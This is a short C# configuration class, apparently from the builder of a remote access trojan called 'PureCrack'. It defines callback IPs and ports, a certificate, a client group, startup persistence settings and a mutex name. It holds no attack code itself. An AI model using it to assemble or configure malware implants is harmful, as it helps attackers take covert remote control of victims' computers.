using System.Collections.Generic; namespace PureCrack.Build; public sealed class BuildConfig { public List Ips { get; init; } = new List { "127.0.0.1" }; public List Ports { get; init; } = new List { 56001 }; public string CertPfxBase64 { get; init; } = ""; public string Group { get; init; } = "Default"; public bool B0 { get; init; } public bool B1 { get; init; } public string StartupName { get; init; } = ""; public string StartupEnv { get; init; } = ""; public string Mutex { get; init; } = "purecrack-default"; public bool B2 { get; init; } }